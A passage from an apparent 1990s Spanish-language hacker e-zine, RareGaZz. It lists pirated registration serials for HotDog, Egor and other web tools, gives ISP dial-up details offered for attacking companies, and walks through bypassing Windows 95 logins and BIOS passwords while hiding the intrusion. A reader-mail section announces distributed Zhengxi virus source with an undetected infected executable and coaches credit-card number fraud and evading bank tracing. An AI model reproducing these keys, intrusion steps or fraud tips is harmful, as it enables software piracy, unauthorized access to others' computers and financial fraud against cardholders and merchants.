Serial Number: 0MVLQQVWV6RZXCCAE9YP

------------------ end -------------------

Broadway
Crea Java Marquess

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0RBQMUNC08APMYNLK5YT

------------------ end -------------------

Clikette
Botones 3D

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 04RN4FE74M0P5JC7P728

------------------ end -------------------

Crosseye 1
Crea mapas graficos (supongo usando java)

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0J4HVC98ZAKXK1CH4JZY

------------------ end -------------------

Upgrade Egor 1 or 2 --> Egor 3
Egor es un animador de graficos basado en Java, si ya tienes el 1 o 2 este
es el codigo para registrar el upgrade...

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0R5BBAC60TB0BXHC4XR9

------------------ end -------------------

FrameGang 1
quieres poner frames a tu pagina? este programa es lo que necesitas!

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 007NTFEF3615EV1J7JAM

------------------ end -------------------

Flash 2
Texto Scrolling

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0FVN3BJZRVRLMBHUV6CY

------------------ end -------------------

Site FX
applets java compactos para efectos graficos

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0MH2DTCYRDHJE8440UR4

------------------ end -------------------

Swami
Programa para animar texto usando Java [ keewwl ]

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0MW1Q2RNWKKJTBYFNE2W

------------------ end -------------------

Upgrade HD Std 16 1 or 2 --> HD Pro 3 (for Win95)
Upgrade del hotdor standard al profesional

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0QRLZND3XAJX7MN97T40

------------------ end -------------------

Weenie - Bang
Graficos animados

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 02UKMA9YRY91QH5PL9A3

------------------ end -------------------

Weenie - Bullets
Graficos animados

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 00EN2YWF3CUBQXF6W05P

------------------ end -------------------

Weenie - Critters
Graficos animados

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0K6UZVDRCFRTKK6FN9NT

------------------ end -------------------

Upgrade HotDog Pro 1 - HotDog 16 bit v2

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 03B13NQX8N29LD72EL78

------------------ end -------------------

HotDog 16 bit v2
Duh?

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 05U0B6MFBF8U0XUYFCYP

------------------ end -------------------

Weenie - Spinners
Graficos animados

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0FEWBQLTU91LHJRZ9BC4

------------------ end -------------------

Upgrade HotDog Std 1 or 2 --> HotDog 16 bit v2

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0HZYUR6TPDTTL6Q4L2WA

------------------ end -------------------

Upgrade HotDog Pro 32 v1 --> HD Pro 3 (for Win95)

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0HUE668CCJ8BBLTDNKM0

------------------ end -------------------

Upgrade HD Pro 16 v1 --> HD Pro 3 (for Win95)

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0RFFKFZX0VU494ZNALM0

------------------ end -------------------

Upgrade HD Pro 16 v2 --> HD Pro 3 (for Win95)

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 05YWKJFMQB0R1XY2PMYM

------------------ end -------------------

Upgrade HD Std 32 --> HD Pro 3 (for Win95)

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0HQTBW1935AY8DARB358

------------------ end -------------------

Weenie - Wierd Faces
Graficos animados

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 08MYPT2FMKUFL1CNBYD9

------------------ end -------------------

Egor 3
poderosa aplicacion para crear applets java

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0M64BBWTVLKEBE9U0CC2

------------------ end -------------------

HotDog Professional 3 (for Windows95)
Uno de los mejores editores de HTML

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0FDYL11D6F82BH65HR70

------------------ end -------------------

Los programas piden el codigo de registro que debera ser copiado usando
COPY -- PASTE en el cuadro que el programa lo indique incluyendo TODO lo
que esta entre las lineas cut here y end incluyendo el espacio en blanco.

Codigo adicional sin costo extra!
Neobook Professional: 1251418CKNHPOI

--> raregazz, su editor o cualquiera de sus colaboradores no se hacen
responsables del uso y publicacion de estos codigos asi como de la manera
en que estos hayan sido obtenidos. No existe forma alguna de saber quien
los envio (lo hicieron usando remailers) y cualquier problema con estos
codigos NO debera ser tratado con nosotros. Todos estos codigos estan
probados y si funcionan. Por favor no email preguntando como funcionan
o como se usan estos programas.

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

TTTTTTTTTTTTTTT
TTTTTTTTTTTTTTT XXX XXX
TTT XXX XXX
TTT UU UU CCCCCC AA NNNN NN XXX XXX
TTT UU UU CC AA AA NN NN NN XXXX
TTT UU UU CC AAAAAAA NN NN NN XXX XXX
TTT UU UU CC AA AA NN NNNN XXX XXX
TTT UUUUUUU CCCCCC AA AA NN NNN XXX XXX


Que ondas es la primera vez que mando algo a la revista y espero les sirva.
Ahi les van algunos numeros, scripts y servidores a todos los compas que
leen la revista y quieren intentar hackear a alguna compa¤ia esto les puede
servir:

****************************************************************************

Datos de Compunet:

Prestadora del servicio:

compunet.com.mx

Nombre de la cuenta: ??????
Password: ??????

PRIMARY DNS: 207.248.192.11
SECONDARY: 207.248.192.12
POP SERVER: 207.248.197.6
SMTP SERVER: 207.248.197.6
NNTP SERVER: 207.248.197.6

Telefonos de acceso:

76-25-10 , 76-27-25 , 77-10-24 , 77-09-80 , 77-34-08 , 77-34-09 ,
77-16-57 , 77-16-34 .

[ una vez dentro de este sistema solamente se presentan algunos directorios
y no aparece el directorio /etc por lo que a primera vista parece ser un
"servidor seguro" ]

****************************************************************************

Datos de Telnor:

Prestadora del servicio:

telnor.net

Nombre de la cuenta: ??????
Password: ??????

PRIMARY DNS: 200.23.249.1
SECONDARY: 200.23.248.1
SMTP: email.telnor.net { parece que cambio por dns.telnor.net } [ uhh?? ]
Gateway: 200.23.249.3
Netmask: 255.255.255.0

Telefono de acceso:

76-33-01

[ Notas: servicio llleeeennnntttttiiiisssssiiiiimmmmmooooo y la mayoria de
las veces esta ocupado el numero telefonico. ¨alguien tiene el passwd? ]

****************************************************************************

Datos de Cetys:

Prestadora del servicio:

orca.ens.cetys.mx

Nombre de la cuenta: ??????
Password: ??????

Aqui es necesario usar trumpet winsock y obtener los datos de una cuenta.
[ been there, done that! ] Lo siguiente es el login.cmd y bye.cmd necesarios
para conectarte a traves de internet cetys.
{ solo lo que esta entre asteriscos }. Donde dice username y password debes
de poner el nombre de la cuenta y el password respectivamente.

-------------------------------login.cmd--------------------------------------
****************************************************************************

# Multiple number redial script Sample for Trumpet Winsock
# Written by TucanX (TucanX@gratismail.com)
# Modificado para cetys universidad, campus ensenada por
# TucanX (TucanX@gratismail.com)

# Definiciones
$access1 = "745300"
$access2 = "745301"
$username = "???????"
$password = "???????"
$pppcomand = "ppp"
$id_prompt = "!login: "
$pw_prompt = "Password:"
$srvc_prompt = "bye]:"
$online_prompt = "tun"
$addr_leadin = "Your IP address is "
%access_nums = 4
%busy_limit = 3
%bad_limit = 3
%total = %busy_limit + %access_nums
%tries = 0
%busy = 0
%bad = 0
%pass = 0
%reset = 0
$goodbye = "no"
$reset = "atz"
$init = "ats11=55s7=35"
$access = $access1

#deshabilite la siguiente linea si desea ver el resultado de los
#comandos en el puerto de comunicaciones
echo off

#presentacion
display "Script de acceso PPP v3.0" \n
display "Cetys universidad, Campus Ensenada" \n
display "Programado por TucanX (TucanX@gratismail.com)" \n
display "En base a codigo por TucanX (TucanX@gratismail.com)" \n
display "Gracias a Raretrip y la revista RareGaZz" \n
display " Adios"
sleep 3

#Obtener Username y Password. Estos seran enviados al servidor al
#conectarse
query $username "Teclee su nombre de usuario en orca"
password "Teclee el password para su cuenta en orca"

#Proceso de entrada con varios Modems
repeat

if ! %reset
display \n"Inicializando el modem... " \n
output $reset\r
input 30 OK\n
output $init\r
input 30 OK\n
%reset = 1
end

if %access_nums > 1 & $access = "bad"
%loops = 0
repeat
%pass = %pass + 1
if %pass = 1
$access = $access2
end

if %pass = %access_nums
$access = $access1
%pass = 0
end
%loops = %loops +1
if %loops > %access_nums
$goodbye = "No se encontraron numeros libres - abortando..."
end
until $access <> "bad" | $goodbye <> "no"
end

if %tries = %total + 3
$goodbye = "\n Se alcanzo el limite de reintentos - abortando...\n "
end

if $goodbye <> "no"
display \n$goodbye\7\n
display \n"Por favor intente de nuevo mas tarde."
display \n\n"Script de enlace Cetys universidad, Campus ensenada."\n
display "Programado por TucanX en base a codigo"\n
display "por TucanX."\n
display \n"gracias por usar este servicio..."\n
output +++\r
output ath0\r
abort
end

$goodbye = "no"
%connect = 0
%tries = %tries + 1
display \n"Intento #"%tries\n
sleep 1
display \n"Marcando..."\n
display $access \n
outputecho atdt $access\r
$modem = ""
while $modem = ""
%dummy = [read 35 $modem]
end

$result = copy($modem, 1, 10)
if $result = "BUSY"
%bad = %bad + 1
if %access_nums > 1
if $access = $access1
$access1 = "bad"
end
if $access = $access2
$access2 = "bad"
end
if %bad = %access_nums
$goodbye = "No se encontraron lineas libres - Abortando..."
else
display \n"La línea" $access "se encuentra ocupada."\n
$access = "bad"
%reset = 0
end
else
if %bad > %bad_limit - 1
$goodbye = "Se alcanzo el limite de NO CARRIER - abortando..."
else
%reset = 0
end
end
end

$result = copy($modem, 1, 4)
if $result = "NO CARRIER"
%busy = %busy + 1
if %busy = %busy_limit
$goodbye = " No se encontraron numeros libres - abortando... "
end
end

$result = copy($modem, 1, 7)
if $result = "CONNECT" | $result = "CARRIER"
# wait 30 dcd
display "Servidor orca PPP... acceso logrado. " \n
display "EN LINEA... iniciando protocolo de entrada..." \n
output \13
%connect = 1
end

if $modem <> "NO CARRIER" & $modem <> "BUSY" & %connect = 0
display \n"Evento no esperado - reintentando..."\n
end

# log current attempt data to .ini file
$section = "current"
save %tries $section
save %busy $section
save %bad $section
save $modem $section

until %connect

# Una vez lograda la coneccion, script para login, password y protocolo

# Identificacion de usuario (login:)
input 30 $id_prompt
output $username\13
display \n"Mandando identificacion de usuario..." \n

# Clave de acceso (password:)
input 30 $pw_prompt
display \n"Mandando password... "\n
output $password\13

# Opcion de menu PPP
input 30 $srvc_prompt
display \n"Inicializando protocolo..."\n
output $pppcomand\13
display " EN LINEA... puede lanzar ahora sus aplicaciones de Internet" \n
display " para cerrar la coneccion seleccione DIALLER/BYE " \n
# Espera a que el proceso este listo
# input 30 $online_prompt
# Read the IP number
# online
# display \n"Negociando direccion IP..."\n
# address 30
# input 30 \n
# $addr_leadin
# display \n" En linea... Tu direccion IP es \i \n

****************************************************************************

----------------------------------bye.cmd-------------------------------------
****************************************************************************

display \n"
cancelando..."\n
# echo off
set dtr off
sleep 1
set dtr on
if ![input 2 \n]
output +++
if [input 3 OK\n]
display \n\n"
Script de enlace Cetys universidad, Campus ensenada."\n
display "
Programado por TucanX en base a codigo"\n
display "
por TucanX."\n
display \n"
gracias por usar este servicio..."\n

output ath0\r
end
end

****************************************************************************

Telefono de acceso:

74-53-00 , 74-53-01

****************************************************************************

Datos de Red Tecnologica Nacional (RTN):

Prestadora del servicio:

rtn.net.mx

Nombre de la cuenta: ??????
Password: ??????

PRIMARY DNS: ????????????
SECONDARY: ????????????
SMTP: rtn.net.mx
Gateway: 200.34.68.254 <-- Supuestamente un BackBone de MCI
Netmask: ?????????????

Telefono de acceso:

5283939

****************************************************************************

Espero y esto los ayude para cualquier comentario escribir a:
tucanx@gratismail.com

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ COMO CRACKER CUALQUIER SISTEMA BASADO EN WINDOWS 95 ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ Por: Guybrush ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ E-Mail: guybrush@axis.org ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ INDICE ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

0-Introduccion

1-¨Por que no sirve el Windows 95 como sistema multiusuario?

2-¨Es facil cracker el Windows 95?
2.1-Como hacerlo
2.2-Nos lo ponen algo dificil
2.3-Saltando todas las barreras

3-Despedida

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 0-INTRODUCCION ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Hay muchos articulos que hablan sobre Unix, Internet y otros temas ya muy
vistos (como mi anterior articulo, que espero que hayas leido) :)
Para variar un poco os voy a hablar del famoso y polemico 'Windows 95'.
Vereis que se pueden hacer algunas cosas con el (cuando no se cuelga) X-DDD

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 1-¨POR QUE NO SIRVE EL WINDOWS 95 COMO SISTEMA MULTIUSURIO? ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Los que venis de Windows 3.x habreis notado una gran mejora tanto en el
entorno como en la multitarea. La verdad es que el Windows 3.x no tenia
multitarea, asi que esto es algo que se agradece bastante en el Windows 95.
Pero sigue estando el problema de que el nucleo del Windows es el indestruc-
tible MS-DOS. Si, no conseguimos librarnos de el. Por problemas de compatibi-
lidad de programas, tanto Windows 3.x como Windows 95 estan funcionando bajo
MS-DOS (aunque el 95 lo disimule bien - parece como si el S.O. fuera el Win 95
y el MS-DOS solamente un sub-shell).

Dejando aparte que el Windows 95 aun deja mucho que desear (a pesar de la mul-
tatarea y de las 'multiples' veces que chafa nuestras 'tareas' quedandose col-
gado), tiene el inconveniente de que sus creadores no deben de saber aun lo
que es un sistema operativo 'multiusuario' porque nosotros podemos crear todos
los usuarios que queramos, cada uno con sus contrase¤as y sus entornos, pero
todos ellos son SUPERUSUARIOS, por lo que cada uno de ellos tiene acceso a
todo el disco duro, lo que quiere decir que puede ver, modificar, ejecurar o
borrar ficheros que no son suyos.

Por tanto, si tienes 'cuenta' en un ordenador con sistema Windows 95, ya eres
el superusuario. ­Demasiado facil!. :)

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 2-¨ES FACIL CRACKEAR EL WINDOWS 95? ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Ya hemos visto antes que teniendo cuenta, si. Pero ¨que ocurre si no tenemos
cuenta?. Mas claramente para los que aun siguan despistadillos. ¨Que pasa si
encendemos un ordenador, se arranza el Windows 95 y luego nos pide un login
y un password? ¨Como accedemos a ese ordenador?

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³2.1-COMO HACERLO³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Si estas habituado a usar Windows 95 te habras dado cuenta de que cuando apa-
rece el mensaje de 'Iniciando Windows 95' podemos pulsar la tecla F8 tras la
cual nos aparece un menu. Bien, como hemos visto que no tenemos acceso al or-
denador, reseteamos y estamos atentos para pulsar esta tecla al ver el mensa-
je. ¨Ya esta? Ahora elegimos la opcion 6 que es la de acceder al simbolo del
sistema. Ahora entramos en el directorio de Windows y renombramos todos los
archivos cuya extension es '.PWL' que son los archivos de los usuarios con sus
claves correspondientes. Por ejemplo: 'ren *.pwl *.guy'. Ahora volvemos a re-
setear y cuando se arranque Windows nos pedira que introduzcamos un nombre de
usuario y una contrase¤a para este. Como hemos (aparentemente) eliminado los
ficheros PWL, Windows no encuentra ningun usuario y nos pide que creemos uno
nuevo (como ocurre cuando lo instalamos). Despues de cotillear, borrar, o lo
que quieras hacer, borra el fichero nuevo que se ha creado con extension PWL,
correspondiente al nuevo usuario que has creado y vuelve a renombrar los fi-
cheros anteriores (para que no se den cuenta del cambio). En este caso:
'ren *.guy *.pwl'.

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³2.2-NOS LO PONEN ALGO DIFICIL³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

¨Que ocurriria si al arrancar Windows pulsaramos F8 y no pasara nada? ¨Esta
estropeada la tecla F8? No, no es eso. Lo que ocurre es que ese menu que ofre-
ce Windows puede desactivarse. Pero antes de deciros como se activa os dire
que podeis tambien arrancar con un disco llave y una vez que hallais accedido
en modo MS-DOS, repetis el procedimiento anterior: entrar en el directorio
Windows, renombrar ficheros, etc. Luego sacais el disco y reseteais.
Para volver a poner los ficheros como estaban se hace exactamente lo mismo.

Aunque no es necesario, os dire como activar/desactivar el menu F8. Para ello
teneis que modificar el fichero msdos.sys (el que no domine el MS-DOS mejor
que haga una copia antes de este fichero). Supongo que el que este leyendo
esto es lo bastante listo como para saber que ese fichero es oculto y solo de
lectura. Uhmmmm ¨no sabes como editarlo y modificarlo? Usa el attrib (si eres
tan lamer como para no saber usarlo, aprende antes MS-DOS).

Bueno, debajo de donde pone [Options] debes a¤adir BootKeys=0 para desactivar
el menu de inicio. Para activarlo dale el valor 1, o simplemente elimina esa
linea.

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³2.2-SALTANDO TODAS LAS BARRERAS³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Mas dificil todavia. ¨Y si esta el menu de inicio desactivado? Recurrimos a
arrancar con un disco llave. Pero ¨que ocurriria si la BIOS esta configurada
para que primero lea la unidad C y luego la A (osea que no se puede arrancar
desde disquete)? Lo primero que haria cualquiera (por lo menos yo) es entrar
en la configuracion de la BIOS y modificar esta opcion para que arranque pri-
mero desde la unidad A. Pero ... ­sorpresa! ­tiene contrase¤a!. Debemos saltar
esta contrase¤a si queremos acceder a ese disco duro. Aunque hay algunas BIOS
faciles de crackear (simplemente ejecutando un peque¤o programa te dice cual
es la contrase¤a) en este caso no lo podemos hacer ya que este programa no lo
podriamos ejecutar (ni desde el disco duro ni desde la disquetera).

Solo nos queda una solucion (un poco arriesgada, pero ... el que algo quiere
algo le cuesta). Abrimos el ordenador y desconectamos los 2 cables que sumi-
nistran corriente a la placa base. Cuando los volvamos a conectar, la BIOS es-
tara configurada por defecto y, por supuesto, sin contrase¤a.

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 8-DESPEDIDA ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Esto es todo por hoy. espero que te halla servido de ayuda y que me escribas
si tienes alguna duda. Tambien me gustaria que me corrigierais si es que me
he confundido en algo.

Un saludo.

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<


B O O M E R A N G
^~^~^~^~^~^~^~^~^
"
Tu linea de comunicacion segura con el underground"
Mail Boy...RareTrip

Ultimamente se habia vuelto esta seccion 'no tan segura' por que empezaron
a aparecer las firmas de las personas que nos escribian por un error de la
persona que le tocaba hacer esta seccion el numero pasado.
Ya no se preocupen, de ahora en adelante su nombre o handle no volvera a
aparecer en esta seccion a menos que ustedes especifiquen lo contrario.
Las preguntas que aqui aparecen son solamente las que le puedan interesar
a otras personas y no todos los mensajes que recibimos.

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

!!URGENTE!!
Muchos colaboradores que publican su direccion de correo en esta revista se
ven atacados por individuos que aun no identificamos. Estas personas se hacen
pasar por nosotros y dan instrucciones para ejecutar virus o cosas asi.
Nosotros *nunca* enviaremos a ningun lector o colaborador un archivo, si
tenemos que hacerles llegar algun ejecutable lo pondremos en la pagina web.
Para todos aquellos que recibieron mail pidiendo que se comunicaran con
nosotros a otras direcciones no hagan caso! Las unicas direcciones que pueden
usar para escribirnos es raregazz@bigfoot.com para alcanzar a todos los que
ayudan a la revista o a raretrip@cyberdude.com por si tienes algun mensaje
personal hacia mi. Solo confien mensajes de nosotros cuando sean respuestas
a mensajes suyos o esten firmados con nuestra *nueva* llave pgp. La firma
debera ser verificada usando la llave que esta en nuestra pagina web.

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

Ustedes como parte de la revista tienen que decidir que hacer con esta
situacion, recuerdan el "
log-in" de nuestra pagina donde les pedimos sus
datos entre los que estan su ciudad ?? pues muchos forms nos llegan de la
misma ciudad y a lo mejor ni se conocen por lo que vamos a tratar de crear
grupos de minorias en cada ciudad del mundo con las personas que participen
en este plan piloto. Si nos mandan los datos que les pedimos abajo, nosotros
vamos a hacerla de 'busca parejas' y cuando dos o mas personas nos manden
sus datos y coincida la ciudad entonces les avisamos a todos los de la misma
ciudad y les damos las direcciones de correo electronico para que se pongan
de acuerdo entre ustedes si se quieren conocer...que opinan?

To: RareGaZz@Bigfoot.com
Subject: HACKERZ (en mayusculas y con zeta)
----------------------------------------------------------->
Nombre:
Ciudad:
Estado:
Edad:
Grado de estudios:
Email:

El proposito es crear grupos de aficionados a las redes y pc's que luego con
el tiempo y experiencia puedan pasar a formar parte de los grupos de hackers
de habla espa¤ol y asi expandir la cultura hacker a todos los horizontes
posibles. Tambien les seria util a todos para hacer el clasico intercambio
de software, passwords y muchas otras cosas.

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

seria bueno que publicaran el codigo fuente del virus Zhengxi...

[ El codigo nos lo enviaron (V0V_77) y esta en el archivo incluido con esta
revista ZHENGXI.ZIP junto con un ejecutable que ya viene infectado. Hasta
ahora ningun antivirus detecta el ejecutable infectado asi que manejenlo
con cuidado. Otra cosa, el codigo del virus y el archivo infectado fueron
conseguidos de la revista espa¤ola (en ingles) 29A que la pueden encontrar
en http://29a.islatortuga.com/ ]

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

ATENCION TODOS LOS USUARIOS DE PGP 2.6.2 Internacional:

Cuando ejecuten el comando: pgp -kg para generar sus llaves pgp tienen 3
opciones:

Pick your RSA key size:
1) 384 bits- Casual grade, fast but less secure
2) 512 bits- Commercial grade, medium speed, good security
3) 1024 bits- Military grade, very slow, highest security
Choose 1, 2, or 3, or enter desired number of bits: 2048
~~~~
La opcion mas segura es 2048 pero no aparece en el menu de la version
internacional de Pretty Good Privacy. Si tu copia de PGP no dice RSA sino
RSAREF solo puedes escoger 1024 bits como maximo para tu llave.
La nueva llave de RareGaZz es de 2048 para aumentar la seguridad de ustedes
y la nuestra. Si quieren conseguir las versiones internacionales de PGP
en la seccion de WareZ de nuestra revista podran encontrar las 2 versiones
actualmente disponibles (32 bits y 16 bits).

A todos los que bajaron su copia de PGP de nuestra pagina pueden seguir
usandola para encriptar y decriptar mensajes para las llaves de 2048 bits.

Si quieres conseguir un shell para PGP en Windows o una version PGP para
Macintosh, FreeBSD o cualquier otro sistema visita la pagina internacional
de PGP en: http://www.ifi.uio.no/pgp/
Ahi esta el link para bajar el programa INAS (Is not a Shell) para Windows
95 que no necesita la version DOS para funcionar. Si les interesa tambien
pueden conseguir el codigo fuente de PGP.

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

¨ que tipo de riesgos crea el uso de numeros de tarjetas no autorizadas ?

[ Primero que nada necesitas saber DONDE usar el numero que tengas.

-Si vas a una tienda de software en internet nunca piden tan solo el numero
de tarjeta, te piden nombre de usuario y algunas veces su direccion! El
programa que esta en nuestra seccion de warez (Credit Master v4.0) es
unicamente para crear numeros verdaderos pero eso no quiere decir que la
tarjeta exista. El programa usa los algoritmos de las distintas compa¤ias
y es util en algunas paginas porno que solo permiten la entrada a mayores
de edad (comprueban esto pidiendo un numero de tarjeta que pueda ser
comprobado como verdadero por los algoritmos de las tarjetas).

-Hay un lugar, creo que es www.rubberchicken.com donde mandan bromas a
domicilio y hay que pagar tan solo con el numero de tarjeta y fecha de
expiracion -en especial unas tarjetas de broma- lo que hace facil el ser
compradas usando un programa generador de numeros validos. La fecha de
expiracion es una de dos, par o impar, asi que solo hay dos intentos.

ahora viene lo legal (y tedioso) del asunto...

hacer esto SI implica fraude bancario, despues de todo estas obteniendo
software que cuesta dinero y eso alguien tiene que pagarlo. seguramente no
sera el due¤o de la tarjeta pero tampoco la compa¤ia que lo vendio, por lo
que si el banco que expiro esa tarjeta puede llegar a rastrear esa compra
estate seguro que lo hara (y lo hacen).
--> pero cuando nos a detenido algo que sea ilegal? <--

prevencion de paranoia

Ahora que si hiciste la compra cuidadosamente y usando los consejos que dimos
en la revista tu conciencia debe estar tranquila. Si por equivocacion
recibiste el "
producto" usando tu nick borra toda huella de el que pueda
llevar a alguien investigandolo a tu verdadera identidad. Por ejemplo, si
recibiste el producto por email a una cuenta de bigfoot ni creas que es
anonima la direccion destino! en cuanto un banco pida autorizacion para
revisar registros de esas direcciones...BANG you go down.
Lo mismo en hotmail y en todos los servicios en linea. si usaste una cuenta
en hotmail asegurate de no volverla a usar. si quieres volver a hacerlo con
exito por el momento crea una cuenta en www.gratismail.com y desde que la
registres hasta que termines de usarla para obtener el "
producto" usa el
www.anonymizer.com (recomiendo que te lleves toda la info a una universidad
o centro de computo publico y desde ahi hagas todo el show).
las precauciones son importantes por que si no cuando quieras pasar un dia
alegre en compa¤ia de...digamos una amiga no podras estar seguro pensando
que en cualquier momento podrian llegar los perjudiciales a tu casa tumbando
la puerta pistola en mano... jeh :-) ]

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

ustedes dijeron en algun numero anterior varios trucos para evadir la
seguridad en windows 95 y aqui les tengo otro que aprendi de chiripa :
